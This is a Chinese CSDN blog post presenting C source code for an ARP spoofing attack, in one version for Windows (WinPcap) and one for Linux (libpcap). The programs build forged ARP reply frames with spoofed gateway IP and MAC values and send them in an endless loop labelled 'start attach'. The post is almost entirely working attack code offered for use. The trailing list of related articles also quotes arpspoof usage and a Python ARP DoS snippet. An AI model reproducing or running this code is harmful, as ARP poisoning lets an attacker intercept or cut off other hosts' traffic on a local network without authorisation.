arp攻击代码--自己手动填入arp

最新推荐文章于 2023-09-11 23:26:20 发布
最新推荐文章于 2023-09-11 23:26:20 发布
阅读量5.3k 收藏 5
点赞数 2
分类专栏: linux网络底层抓包 文章标签: arp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1242245/article/details/24739695
版权

arp攻击

windows:

//#if 0
#define _CRT_SECURE_NO_DEPRECATE
#include "pcap.h"
//#include <winsock2.h>
#include <IPHlpApi.h>
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib,"wpcap")
#pragma comment(lib,"ws2_32")
//=========数据包结构申明========================
typedef struct IP_Address //32位的IP地址
{
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;

}ip_address;


typedef struct Hard_Mac //48位的MAC地址
{
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;
    u_char byte5;
    u_char byte6;
}Hard_Mac;

/* Ethernet header */
typedef struct Ethernet_Header //112位 48位SMac+48位SMac+16位协议类型 以太网头
{
    Hard_Mac DMac; //(1)48位目MAC地址
    Hard_Mac SMac; //(2)48位源MAC地址
    WORD PType; //(3)16位协议类型
}Ethernet_Header;
typedef struct ARP_Header //定义ARP首部
{
    Ethernet_Header FrameHeader;//帧头
    WORD HardWare; //(4)16位网卡硬件类型
    WORD PType3; //(5)16位协议类型
    u_char HLeng; //(6)8位硬件地址长度
    u_char PLeng; //(7)16位协议地址长度
    WORD Oper; //(8)16位操作选项
    Hard_Mac SMac3; //(9)48位源MAC地址
    ip_address Saddr; //(10)32位源IP地址
    Hard_Mac DMac3; //(11)48位目标MAC地址
    ip_address Daddr; //(12)32位目标IP地址
    BYTE      padding[18]; //填充0
}ARP_Header;

//=====================================================================
//填充APR数据包
//======================================================================
ARP_Header filtpacket(char ip[4 * 4])
{
    int j = 0;
    for (int i = 0; i < sizeof(ip);i++){
        if (ip[i]=='.'){
            //char myip = strcat(ip[j],ip[]);
        }
    }
    ARP_Header ARPH; //发送的ARP包结构
    //先初始化三层ARP的MAC地址
    
    
    ARPH.DMac3.byte1 = 0xD0; ARPH.DMac3.byte2 = 0x67; ARPH.DMac3.byte3 = 0xE5;
    ARPH.DMac3.byte4 = 0x21; ARPH.DMac3.byte5 = 0xA4; ARPH.DMac3.byte6 = 0x1C; //目标MAC地址
    //ARPH.DMac3.byte1 = 0x00; ARPH.DMac3.byte2 = 0x0f; ARPH.DMac3.byte3 = 0xe2;
    //ARPH.DMac3.byte4 = 0x80; ARPH.DMac3.byte5 = 0xb8; ARPH.DMac3.byte6 = 0x2d;  //目标MAC地址

    ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0x9C; ARPH.SMac3.byte6 = 0x8E; //源MAC地址
    //ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    //ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0xA4; ARPH.SMac3.byte6 = 0x1C; //源MAC地址

    ARPH.FrameHeader.SMac.byte1 = 0xD0; ARPH.FrameHeader.SMac.byte2 = 0x67; ARPH.FrameHeader.SMac.byte3 = 0xE5;
    ARPH.FrameHeader.SMac.byte4 = 0x21; ARPH.FrameHeader.SMac.byte5 = 0x9C; ARPH.FrameHeader.SMac.byte6 = 0x8E; //源MAC地址
    //ARPH.FrameHeader.SMac.byte1 = 0xD0; ARPH.FrameHeader.SMac.byte2 = 0x67; ARPH.FrameHeader.SMac.byte3 = 0xE5;
    //ARPH.FrameHeader.SMac.byte4 = 0x21; ARPH.FrameHeader.SMac.byte5 = 0xA4; ARPH.FrameHeader.SMac.byte6 = 0x1C; //源MAC地址
     //ARPH.FrameHeader.DMac.byte1 = 0xD0; ARPH.FrameHeader.DMac.byte2 = 0x67; ARPH.FrameHeader.DMac.byte3 = 0xE5;
     //ARPH.FrameHeader.DMac.byte4 = 0x21; ARPH.FrameHeader.DMac.byte5 = 0xA4; ARPH.FrameHeader.DMac.byte6 = 0x1C; //目标MAC地址
    //ARPH.FrameHeader.DMac.byte1 = 0x00; ARPH.FrameHeader.DMac.byte2 = 0x0f; ARPH.FrameHeader.DMac.byte3 = 0xe2;
    //ARPH.FrameHeader.DMac.byte4 = 0x80; ARPH.FrameHeader.DMac.byte5 = 0xb8; ARPH.FrameHeader.DMac.byte6 = 0x2d;   //目标MAC地址


    ARPH.FrameHeader.DMac.byte1 = 0xff; ARPH.FrameHeader.DMac.byte2 = 0xff; ARPH.FrameHeader.DMac.byte3 = 0xff;
    ARPH.FrameHeader.DMac.byte4 = 0xff; ARPH.FrameHeader.DMac.byte5 = 0xff; ARPH.FrameHeader.DMac.byte6 = 0xff;
    ARPH.FrameHeader.PType = htons(0x0806);//协议类型为ARP

    ARPH.HardWare = htons(0x0001);//10M Ethernet

    ARPH.PType3 = htons(0x0800);//协议类型为IP

    ARPH.HLeng = 6; //硬件地址长度

    ARPH.PLeng = 4; //IP地址长度

    ARPH.Oper = htons(0x0002); //请求操作
    //hostent myhost;
    //myhost = gethostbyname();

    //ARPH.Daddr.byte1 = 10; ARPH.Daddr.byte2 = 3; ARPH.Daddr.byte3 = 130; ARPH.Daddr.byte4 = 227; //目标IP地址
    //ARPH.Daddr.byte1 = 10; ARPH.Daddr.byte2 = 3; ARPH.Daddr.byte3 = 130; ARPH.Daddr.byte4 = 227; //目标IP地址

    ARPH.Saddr.byte1 = 10; ARPH.Saddr.byte2 = 3; ARPH.Saddr.byte3 = 128; ARPH.Saddr.byte4 = 1; //源IP地址
    ARPH.Daddr.byte1 = 0; ARPH.Daddr.byte2 = 0; ARPH.Daddr.byte3 = 0; ARPH.Daddr.byte4 = 0; //目标IP地址
    int i;
    for (i = 0; i<18; i++)
    {
        ARPH.padding[i] = 0;
    }
    return ARPH;
};
//==========================================================
//发送数据包
//==========================================================
void SendPacket(pcap_t *adhandle, ARP_Header ARPH)
{
    //const u_char *Buff;
    //Buff = &ARPH.FrameHeader.DMac.byte1 ; //结构首地址传入Buff

    if (pcap_sendpacket(adhandle, // Adapter
        (u_char *)&ARPH, // buffer with the packet
        sizeof(ARPH)// size
        ) != 0)
    {
        printf("发送数据包失败\n");
    }
    //else
    //printf("发送数据包成功!\n");
}
//=======================================================
//解析数据包
//=======================================================
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
    //struct tm *ltime;
    //char timestr[16];  

    /* convert the timestamp to readable format */
    // ltime=localtime(&header->ts.tv_sec);
    //strftime( timestr, sizeof timestr, "%H:%M:%S", ltime);

    /* print timestamp and length of the packet */
    //printf("%s.%.6d len:%d \n", timestr, header->ts.tv_usec, header->len);

    ARP_Header *ah;

    ah = (ARP_Header *)(pkt_data);

    if (1//ah->FrameHeader.PType == 1544 //&&
        /*ah->Oper == 512 &&
        ah->Daddr.byte1 == 172 &&
        ah->Daddr.byte2 == 18 &&
        ah->Daddr.byte3 == 19 &&
        ah->Daddr.byte4 == 116
        && ah->Saddr.byte1 == 172 &&
        ah->Saddr.byte2 == 18 &&
        ah->Saddr.byte3 == 19 &&
        ah->Saddr.byte4 == 103*/
        )
    {
        /*输出源IP地址,目的IP地址*/
        printf("\n%d.%d.%d.%d-> %d.%d.%d.%d\n",
            ah->Saddr.byte1,
            ah->Saddr.byte2,
            ah->Saddr.byte3,
            ah->Saddr.byte4,
            ah->Daddr.byte1,
            ah->Daddr.byte2,
            ah->Daddr.byte3,
            ah->Daddr.byte4);
        /*输出目的地址,输出源地址,输入协议类型*/
        Hard_Mac SMAC, DMAC;
        Ethernet_Header *eh;
        eh = (Ethernet_Header*)pkt_data;
        SMAC = eh->SMac;
        printf("源地址 %.2x--%.2x--%.2x--%.2x--%.2x--%.2x\n"
            , SMAC.byte1, SMAC.byte2, SMAC.byte3, SMAC.byte4, SMAC.byte5, SMAC.byte6);
        // printf("源地址 %.2x--%.2x--%.2x--%.2x--%.2x--%.2x\n"
        //       ,ah->FrameHeader.SMac.byte1,ah->FrameHeader.SMac.byte2,ah->FrameHeader.SMac.byte3,ah->FrameHeader.SMac.byte4,ah->FrameHeader.SMac.byte5,ah->FrameHeader.SMac.byte6);
        DMAC = eh->DMac;
        printf("目的地址 %.2x--%.2x--%.2x--%.2x--%.2x--%.2x\n"
            , DMAC.byte1, DMAC.byte2, DMAC.byte3, DMAC.byte4, DMAC.byte5, DMAC.byte6);
        printf("帧协议 %.4x\n", ntohs(eh->PType));
        printf("硬件类型%.4x\n", ntohs(ah->HardWare));
        printf("协议类型%.4x\n", ntohs(ah->PType3));
        printf("操作类型%.4x\n", ntohs(ah->Oper));
        printf("数据内容%x\n", ah->padding);
        printf("\n\n==============================================================\n");
    }
}
int main()
{
    PIP_ADAPTER_INFO pAdapterInfo;
    PIP_ADAPTER_INFO pAdapter = NULL;
    DWORD dwRetVal = 0;                                     //查询本机网卡来获得下面的消息   mac则向交换机发送arp包来获取
    pAdapterInfo = (IP_ADAPTER_INFO*)malloc(sizeof(IP_ADAPTER_INFO));
    ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
    {
        free(pAdapterInfo);
        pAdapterInfo = (IP_ADAPTER_INFO*)malloc(ulOutBufLen);
    }
    if ((dwRetVal = GetAdaptersInfo(pAdapterInfo, &ulOutBufLen)) == NO_ERROR)
    {
        pAdapter = pAdapterInfo;
    }
    printf("IP地址:%s\n",pAdapter->IpAddressList.IpAddress.String);
    //打开网卡
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum;
    int i = 0;
    pcap_t *adhandle;
    char errbuf[PCAP_ERRBUF_SIZE];
    char packet_filter[] = "arp";
    /* Retrieve the device list */
    if (pcap_findalldevs(&alldevs, errbuf) == -1)
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the list */
    for (d = alldevs; d; d = d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    if (i == 0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;
    }

    printf("Enter the interface number (1-%d):", i);
    scanf("%d", &inum);

    if (inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return -1;
    }

    /* Jump to the selected adapter */
    for (d = alldevs, i = 0; i< inum - 1; d = d->next, i++);

    /* Open the adapter */
    if ((adhandle = pcap_open_live(d->name, // name of the device
        65536,   // portion of the packet to capture.  
        // 65536 grants that the whole packet will be captured on  all the MACs.
        1,       // promiscuous mode
        1000,     // read timeout
        errbuf   // error buffer
        )) == NULL)
    {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return -1;
    }

    /* Check the link layer. We support only Ethernet for simplicity. */
    /*  if(pcap_datalink(adhandle) != DLT_EN10MB)
    {
    fprintf(stderr,"\nThis program works only on Ethernet networks.\n");
    Free the device list
    pcap_freealldevs(alldevs);
    return -1;
    }

    printf("\nlistening on %s...\n", d->description);

    /* At this point, we don't need any more the device list. Free it */
    pcap_freealldevs(alldevs);

    /* start the capture */

    //

    while (9)
    {
        SendPacket(adhandle, filtpacket(pAdapter->IpAddressList.IpAddress.String));
        //Sleep(20);
    }
    //pcap_loop(adhandle, 0, packet_handler, NULL);

    return 0;


}

linux

#include <pcap.h>
#include <stdlib.h>
#include <iostream>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <string.h>
//=========数据包结构申明========================
typedef struct IP_Address //32位的IP地址
{
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;

}ip_address;


typedef struct Hard_Mac //48位的MAC地址
{
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;
    u_char byte5;
    u_char byte6;
}Hard_Mac;

/* Ethernet header */
typedef struct Ethernet_Header //112位 48位SMac+48位SMac+16位协议类型 以太网头
{
    Hard_Mac DMac; //(1)48位目MAC地址
    Hard_Mac SMac; //(2)48位源MAC地址
    unsigned short PType; //(3)16位协议类型
}Ethernet_Header;
typedef struct ARP_Header //定义ARP首部
{
    Ethernet_Header FrameHeader;//帧头
    unsigned short HardWare; //(4)16位网卡硬件类型
    unsigned short PType3; //(5)16位协议类型
    u_char HLeng; //(6)8位硬件地址长度
    u_char PLeng; //(7)16位协议地址长度
    unsigned short Oper; //(8)16位操作选项
    Hard_Mac SMac3; //(9)48位源MAC地址
    ip_address Saddr; //(10)32位源IP地址
    Hard_Mac DMac3; //(11)48位目标MAC地址
    ip_address Daddr; //(12)32位目标IP地址
    unsigned char      padding[18]; //填充0
}ARP_Header;

//=====================================================================
//填充APR数据包
//======================================================================
ARP_Header filtpacket(char ip[4 * 4])
{
    for (unsigned int i = 0; i < sizeof(ip);i++){
        if (ip[i]=='.'){
            //char myip = strcat(ip[j],ip[]);
        }
    }
    ARP_Header ARPH; //发送的ARP包结构
    //先初始化三层ARP的MAC地址


    ARPH.DMac3.byte1 = 0xD0; ARPH.DMac3.byte2 = 0x67; ARPH.DMac3.byte3 = 0xE5;
    ARPH.DMac3.byte4 = 0x21; ARPH.DMac3.byte5 = 0xA4; ARPH.DMac3.byte6 = 0x1C; //目标MAC地址
    //ARPH.DMac3.byte1 = 0x00; ARPH.DMac3.byte2 = 0x0f; ARPH.DMac3.byte3 = 0xe2;
    //ARPH.DMac3.byte4 = 0x80; ARPH.DMac3.byte5 = 0xb8; ARPH.DMac3.byte6 = 0x2d;  //目标MAC地址

    ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0x9C; ARPH.SMac3.byte6 = 0x8E; //源MAC地址
    //ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    //ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0xA4; ARPH.SMac3.byte6 = 0x1C; //源MAC地址

    ARPH.FrameHeader.SMac.byte1 = 0xD0; ARPH.FrameHeader.SMac.byte2 = 0x67; ARPH.FrameHeader.SMac.byte3 = 0xE5;
    ARPH.FrameHeader.SMac.byte4 = 0x21; ARPH.FrameHeader.SMac.byte5 = 0x9C; ARPH.FrameHeader.SMac.byte6 = 0x8E; //源MAC地址
    //ARPH.FrameHeader.SMac.byte1 = 0xD0; ARPH.FrameHeader.SMac.byte2 = 0x67; ARPH.FrameHeader.SMac.byte3 = 0xE5;
    //ARPH.FrameHeader.SMac.byte4 = 0x21; ARPH.FrameHeader.SMac.byte5 = 0xA4; ARPH.FrameHeader.SMac.byte6 = 0x1C; //源MAC地址
     //ARPH.FrameHeader.DMac.byte1 = 0xD0; ARPH.FrameHeader.DMac.byte2 = 0x67; ARPH.FrameHeader.DMac.byte3 = 0xE5;
     //ARPH.FrameHeader.DMac.byte4 = 0x21; ARPH.FrameHeader.DMac.byte5 = 0xA4; ARPH.FrameHeader.DMac.byte6 = 0x1C; //目标MAC地址
    //ARPH.FrameHeader.DMac.byte1 = 0x00; ARPH.FrameHeader.DMac.byte2 = 0x0f; ARPH.FrameHeader.DMac.byte3 = 0xe2;
    //ARPH.FrameHeader.DMac.byte4 = 0x80; ARPH.FrameHeader.DMac.byte5 = 0xb8; ARPH.FrameHeader.DMac.byte6 = 0x2d;   //目标MAC地址


    ARPH.FrameHeader.DMac.byte1 = 0xff; ARPH.FrameHeader.DMac.byte2 = 0xff; ARPH.FrameHeader.DMac.byte3 = 0xff;
    ARPH.FrameHeader.DMac.byte4 = 0xff; ARPH.FrameHeader.DMac.byte5 = 0xff; ARPH.FrameHeader.DMac.byte6 = 0xff;

    ARPH.FrameHeader.PType = htons(0x0806);//协议类型为ARP

    ARPH.HardWare = htons(0x0001);//10M Ethernet

    ARPH.PType3 = htons(0x0800);//协议类型为IP

    ARPH.HLeng = 6; //硬件地址长度

    ARPH.PLeng = 4; //IP地址长度

    ARPH.Oper = htons(0x0002); //1请求操作  2anser
    //hostent myhost;
    //myhost = gethostbyname();

    //ARPH.Daddr.byte1 = 10; ARPH.Daddr.byte2 = 3; ARPH.Daddr.byte3 = 130; ARPH.Daddr.byte4 = 227; //目标IP地址
    //ARPH.Daddr.byte1 = 10; ARPH.Daddr.byte2 = 3; ARPH.Daddr.byte3 = 130; ARPH.Daddr.byte4 = 227; //目标IP地址

    ARPH.Saddr.byte1 = 10; ARPH.Saddr.byte2 = 3; ARPH.Saddr.byte3 = 128; ARPH.Saddr.byte4 = 1; //源IP地址
    ARPH.Daddr.byte1 = 0; ARPH.Daddr.byte2 = 0; ARPH.Daddr.byte3 = 0; ARPH.Daddr.byte4 = 0; //目标IP地址
    int i;
    for (i = 0; i<18; i++)
    {
        ARPH.padding[i] = 0;
    }
    return ARPH;
};


ARP_Header filtpacket2(char ip[4 * 4])
{
    for (unsigned int i = 0; i < sizeof(ip);i++){
        if (ip[i]=='.'){
            //char myip = strcat(ip[j],ip[]);
        }
    }
    ARP_Header ARPH; //发送的ARP包结构
    //先初始化三层ARP的MAC地址
    ARPH.FrameHeader.SMac.byte1 = 0xD0; ARPH.FrameHeader.SMac.byte2 = 0x67; ARPH.FrameHeader.SMac.byte3 = 0xE5;
    ARPH.FrameHeader.SMac.byte4 = 0x21; ARPH.FrameHeader.SMac.byte5 = 0x9C; ARPH.FrameHeader.SMac.byte6 = 0x8E;
     //ac f7 f3 bc 24 b2      192.168.0.106
    ARPH.FrameHeader.DMac.byte1 = 0xff; ARPH.FrameHeader.DMac.byte2 = 0xff; ARPH.FrameHeader.DMac.byte3 = 0xff;
    ARPH.FrameHeader.DMac.byte4 = 0xff; ARPH.FrameHeader.DMac.byte5 = 0xff; ARPH.FrameHeader.DMac.byte6 = 0xff;
    ARPH.FrameHeader.PType = htons(0x0806);//协议类型为ARP


    ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0x9C; ARPH.SMac3.byte6 = 0x8E; //源MAC地址
    //ARPH.SMac3.byte1 = 0xD0; ARPH.SMac3.byte2 = 0x67; ARPH.SMac3.byte3 = 0xE5;
    //ARPH.SMac3.byte4 = 0x21; ARPH.SMac3.byte5 = 0xA4; ARPH.SMac3.byte6 = 0x1C; //源MAC地址
    ARPH.DMac3.byte1 = 0xC4; ARPH.DMac3.byte2 = 0x6A; ARPH.DMac3.byte3 = 0xB7;
    ARPH.DMac3.byte4 = 0xA3; ARPH.DMac3.byte5 = 0x5A; ARPH.DMac3.byte6 = 0x7A; //目标MAC地址
    //ARPH.DMac3.byte1 = 0x00; ARPH.DMac3.byte2 = 0x0f; ARPH.DMac3.byte3 = 0xe2;
    //ARPH.DMac3.byte4 = 0x80; ARPH.DMac3.byte5 = 0xb8; ARPH.DMac3.byte6 = 0x2d;  //目标MAC地址


    ARPH.HardWare = htons(0x0001);//10M Ethernet

    ARPH.PType3 = htons(0x0800);//协议类型为IP

    ARPH.HLeng = 6; //硬件地址长度

    ARPH.PLeng = 4; //IP地址长度

    ARPH.Oper = htons(0x0002); //请求操作
    ARPH.Saddr.byte1 = 192; ARPH.Saddr.byte2 = 168; ARPH.Saddr.byte3 = 1; ARPH.Saddr.byte4 = 1; //源IP地址
    ARPH.Daddr.byte1 = 192; ARPH.Daddr.byte2 = 168; ARPH.Daddr.byte3 = 1; ARPH.Daddr.byte4 = 107; //目标IP地址
    int i;
    for (i = 0; i<18; i++)
    {
        ARPH.padding[i] = 0;
    }
    return ARPH;
};
//==========================================================
//发送数据包
//==========================================================
void SendPacket(pcap_t *adhandle, ARP_Header ARPH)
{
    if (pcap_sendpacket(adhandle, // Adapter
        (u_char *)&ARPH, // buffer with the packet
        sizeof(ARPH)// size
        ) != 0)
    {
        printf("发送数据包失败\n");
    }
}
int main()
{
    int i=0,devid;
    char   error_content[PCAP_ERRBUF_SIZE];
    pcap_if_t *alldevs, *pdev;
   pcap_findalldevs(&alldevs, error_content);
    for (pdev = alldevs; pdev; pdev=pdev->next)
    printf("#%d: %s---%s\n", ++i, pdev->name, pdev->description? pdev->description:"null description");
    printf("select a device: "); scanf("%d", &devid);
    pdev=alldevs; while (--devid) pdev=pdev->next;
        int sock;
        struct sockaddr_in sin;
        struct ifreq ifr;
        sock = socket(AF_INET, SOCK_DGRAM, 0);
        if (sock == -1)
        {
                perror("socket");
                return -1;
        }
        strncpy(ifr.ifr_name, pdev->name, IFNAMSIZ);
        ifr.ifr_name[IFNAMSIZ - 1] = 0;
        if (ioctl(sock, SIOCGIFADDR, &ifr) < 0)
        {
                perror("ioctl");
                return -1;
        }
        memcpy(&sin, &ifr.ifr_addr, sizeof(sin));
        fprintf(stdout, "%s: %s\n",pdev->name,inet_ntoa(sin.sin_addr));
    pcap_t *adhandle;
    if ((adhandle = pcap_open_live(pdev->name, // name of the device
        65536,   // portion of the packet to capture.
        // 65536 grants that the whole packet will be captured on  all the MACs.
        1,       // promiscuous mode
        0,     // read timeout
        error_content   // error buffer
        )) == NULL)
    {
        printf("Unable to open the adapter. this is not supported by WinPcap\n");
        pcap_freealldevs(alldevs);
        return -1;
    }
    pcap_freealldevs(alldevs);
    char string[4 * 4]="0.0.0.0";
//   printf("%s--%d--%d\n",string,sizeof(string),strlen(string));
//   printf("%s--%d--%d\n",inet_ntoa(sin.sin_addr),sizeof(inet_ntoa(sin.sin_addr)),strlen(inet_ntoa(sin.sin_addr)));
   strncpy(string,inet_ntoa(sin.sin_addr),strlen(inet_ntoa(sin.sin_addr)));
   printf("%s--%d--%d\n",string,sizeof(string),strlen(string));
   int count=0;
       while (1)
    {
        printf("%d---start attach!!!\n",count++);
        //SendPacket(adhandle, filtpacket(pAdapter->IpAddressList.IpAddress.String));
        SendPacket(adhandle, filtpacket2(string));
    }
    return 0;
}


你是我的绝笔
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
arp攻击
嘟的博客
10-26 402
title: arp攻击 tags: 中间人攻击 categories: 渗透测试 arpspoof -h Version: 2.4 Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host aspspoof -t 被攻击ip -r 网关ip 然后可以看到winows主机的arp表的变化 这时所有的wi...
ARP攻击
weixin_45823267的博客
11-13 299
1.ARP缓存表 在每台安装有 TCP/IP协议的主机里都有一个ARP缓存表,用来记录与该主机处 在同一网络中的其它主机的IP地址与MA地址之间的对应关系 执行arp-a命令可以查看ARP缓存表。 缓存表中的记录默认是动态的,被设置了2分钟的自动老化时间 执行arp-d命令可以删除所有或者是指定的记录 2.主机A与同一网络中的主机B的通信过程 ①主机A检查自己的ARP缓存表中是否有与主机B的P地址...
ARP攻击代码实例
10-31
现在有一台计算机A(IP:192.168.85.1 MAC:AA-AA-AA-AA-AA-AA),另一台计算机B(IP:192.168.85.100 MAC:BB-BB-BB-BB-BB-BB)现在用A去 ping B。看见 Reply from 192.168.85.100: bytes=32 time<10ms TTL=32 这样的信息。然后在运行中输入arp -a,会看见 192.168.8.100 BB-BB-BB-BB-BB-BB dynamic这样的信息。那就是arp高速缓存中IP地址和MAC地址的一个映射关系,在以太网中,数据传递靠的是MAC,而并不是IP地址。其实在这背后就隐藏着arp的秘密。你一定会问,网络上这么多计算机,A是怎么找到B的?那么我们就来分析一下细节。首先A并不知道B在哪里,那么A首先就会发一个广播的ARP请求,即目的MAC为FF-FF-FF-FF-FF-FF,目的IP为B的192.168.85.100,再带上自己的源IP,和源 MAC。那么一个网段上的所有计算机都会接收到来自A的ARP请求,由于每台计算机都有自己唯一的MAC和IP,那么它会分析目的IP即 192.168.85.100是不是自己的IP?如果不是,网卡会自动丢弃数据包。如果B接收到了,经过分析,目的IP是自己的,于是更新自己的ARP高速缓存,记录下A的IP和MAC。然后B就会回应A一个ARP应答,就是把A的源IP,源MAC变成现在目的IP,和目的MAC,再带上自己的源IP,源 MAC,发送给A。当A机接收到ARP应答后,更新自己的ARP高速缓存,即把arp应答中的B机的源IP,源MAC的映射关系记录在高速缓存中。那么现在A机中有B的MAC和IP,B机中也有A的MAC和IP。arp请求和应答过程就结束了。由于arp高速缓存是会定时自动更新的,在没有静态绑定的情况下,IP和MAC的映射关系会随时间流逝自动消失。在以后的通信中,A在和B通信时,会首先察看arp高速缓存中有没有B的IP和MAC的映射关系,如果有,就直接取得MAC地址,如果没有就再发一次ARP请求的广播,B再应答即重复上面动作。 好了在了解了上面基本arp通信过程后,arp欺骗就不那神秘了,计算机在接收到ARP应答的时候,不管有没有发出ARP请求,都会更新自己的高速缓存。利用这点如果C机(IP:192.168.85.200 MAC:CC-CC-CC-CC-CC-CC)伪装成B机向A发出ARP应答,自己伪造B机的源MAC为CC-CC-CC-CC-CC-CC,源IP依旧伪造成B的IP即192.168.85.100,是那么A机的ARP缓存就会被我们伪造的MAC所更新,192.168.85.100对应的MAC就会变成CC-CC-CC-CC-CC-CC.如果A机再利用192.168.85.100即B的IP和B通信,实际上数据包却发给了C机,B机根本就接收不到了。实例基于WINCAP编写,描述其本源理与流程.
Arp攻击代码
张亚楠的博客
04-17 1559
以下便是WinPcap环境下的Arp攻击代码#include #include #include int main() { pcap_if_t *alldevs;//定义一个网络接口的一个节点 pcap_if_t *d; int i=0,inum=0,j; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[60]; pcap_t *adhandle;
洪水攻击程序c语言,洪水攻击原理及代码实现全攻略(附源代码)病毒防范 -电脑资料...
weixin_34754795的博客
05-18 770
声明:本文所提供的资料仅仅限于技术交流和学习,请不要用于其他非法目的,维护网络安全是我们的共同责任,下载本文源代码和例程一、 什么是洪水攻击洪水之猛、势不可挡。如果将洪水比作对计算机的攻击,那大家可以想象得出,攻击是多的猛烈。在安全领域所指的洪水攻击是指向目标机器发送大量无用的数据包,使得目标机器忙于处理这些无用的数据包,而无法处理正常的数据包。在攻击过程中,目标机器的CPU的使用率将高于正常值,...
一起学习配置静态ARP
mengmeng_921的博客
03-17 2243
静态ARP表项是指网络管理员手工建立IP地址和MAC地址之间固定的映射关系。正常情况下网络中设备可以通过ARP协议进行ARP表项的动态学习,生成的动态ARP表项可以被老化,可以被更新。但是当网络中存在ARP攻击时,设备中动态ARP表项可能会被更新成错误的ARP表项,或者被老化,造成合法用户通信异常。静态ARP表项不会被老化,也不会被动态ARP表项覆盖,可以保证网络通信的安全性。
【论文】网络安全与入门-ARP攻击
阳阳的博客
07-16 7765
网络安全与入门 班级:嵌入式1511 学号:15200141115 姓名:戚春阳 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断,同时网络攻击会给人们带来巨大的损失,因此保障网络的安全刻不容缓。 在这门公选课上,我了解到ARP攻击的一些原理,...
ARP命令使用详解:手动操作ARP映射信息
十年运维开发经验的王义杰在此分享自己的知识和经验
09-11 1853
通过arp命令,我们不仅可以查看ARP缓存,还可以手动添加或删除映射条目。在网络调试或安全测试的场景中,了解如何手动操作ARP映射是非常有用的。然而,请记住,不当的操作可能会带来不良后果,因此务必小心。这些命令大多需要管理员权限,所以在执行前要三思。如果你觉得本篇文章有用,不妨分享给更多人,让更多的读者了解如何高效地使用arp命令来管理ARP映射信息。
ARP协议图文详解,包含完整测试代码
weixin_28673511的博客
05-21 7135
图文详解ARP协议,花5分钟时间彻底弄懂ARP协议。
arp-scan-1.9.tar.gz
03-29
linux操作系统下,检测网络中的冲突的ip地址对应的mac地址,本工具为源码包,安装方法...tar -xzvf arp-scan-1.9.tar.gz cd arp-scan-1.9 ./autoreconf --install ./configure make && make check && make install
arp欺骗代码
10-11
arp 欺骗 代码 winpcap C++ 可运行 网络安全实验
c预研实现arp攻击方法以及代码
12-27
arp攻击实现方法、原理和c编写的代码。通过代码可以实现arp欺骗
预防和处理ARP攻击病毒-ok.doc
07-02
《预防和处理ARP攻击病毒详解》 ARP攻击病毒是一种针对局域网的恶意攻击手段,主要利用ARP(Address Resolution Protocol,地址解析协议)的工作机制,通过伪造IP地址和MAC地址来实现ARP欺骗,从而对网络通信造成...
window下可用的arp-ping工具
01-03
- 安全监控:ARP欺骗是一种常见的网络攻击手段,通过ARP-Ping可以检测网络中是否存在恶意的ARP应答,帮助发现潜在的安全风险。 - 网络设备管理:在配置和管理网络设备时,ARP-Ping可以快速验证设备的物理连接状态。 ...
SAE ARP 1536B-2015.pdf
最新发布
05-07
### SAE ARP 1536B-2015: Abrasion Test Procedure for Chafe Guard #### 概述 SAE ARP 1536B-2015 是一个由美国汽车工程师学会(Society of Automotive Engineers, SAE)发布的航空航天推荐实践标准文档。该标准...
python写的ARP攻击代码实例
01-20
复制代码 代码如下:#coding:utf-8#example :sudo python arp_dos.py 192.168.1.103 from scapy.all import ARP,sendimport os,re,sys def get_gateway_ip(): t=os.popen(‘route -n’) for i in t: if i.starts...
ARP请求获得MAC地址代码
PPPPPPPKD的博客
05-06 2757
